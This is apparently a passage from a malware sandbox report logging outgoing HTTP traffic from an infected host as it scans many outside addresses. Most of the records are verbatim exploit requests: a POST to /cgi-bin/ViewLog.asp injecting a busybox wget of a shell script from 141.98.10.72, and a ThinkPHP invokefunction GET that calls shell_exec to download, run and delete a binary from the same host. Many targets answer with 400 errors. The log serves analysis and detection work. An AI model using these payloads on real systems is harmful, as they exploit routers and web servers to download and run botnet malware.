                                                      Feb 14, 2024 09:29:38.073915005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:39.705905914 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:42.937833071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:49.593626976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:02.649311066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:29.016593933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      317192.168.2.1538516112.171.185.10180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:36.795583963 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:37.081398964 CET499INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:36 GMT
                                                      Server: Apache/2.2.15 (CentOS)
                                                      Content-Length: 305
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 68 6d 6d 61 6c 6c 2e 6b 72 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.2.15 (CentOS) Server at www.hmmall.kr Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      318192.168.2.154736288.10.162.1280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:38.317133904 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      319192.168.2.153297295.211.247.16480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:38.517011881 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:38.720638990 CET534INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:38 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 340
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 56 4d 2d 34 62 65 65 34 66 33 66 2d 31 66 62 64 2d 34 63 33 37 2d 62 64 66 38 2d 65 34 30 34 33 39 62 39 38 64 61 35 2e 63 73 31 6c 6f 63 61 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at VM-4bee4f3f-1fbd-4c37-bdf8-e40439b98da5.cs1local Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      320192.168.2.153681295.141.36.14680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:38.534024954 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:38.752450943 CET479INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:30:39 GMT
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      321192.168.2.155737695.217.133.22480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:38.541945934 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:38.770459890 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 07:22:15 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      322192.168.2.154668095.217.87.4780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:38.542182922 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:38.770469904 CET450INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:38 GMT
                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.33
                                                      Content-Length: 226
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      323192.168.2.153902295.59.50.1980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:38.813056946 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:39.110260010 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:29:39.110761881 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      324192.168.2.156029694.26.41.1968080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.193672895 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.369884968 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      325192.168.2.154244031.200.99.1648080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.207459927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      326192.168.2.155998295.86.125.1378080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.215545893 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      327192.168.2.155513095.86.125.8980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.363152981 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      328192.168.2.154516295.59.121.5380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.401154041 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:40.691726923 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:29:40.691854954 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      329192.168.2.153546095.183.101.1608080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.453519106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.689815044 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:43.129776001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.009850025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
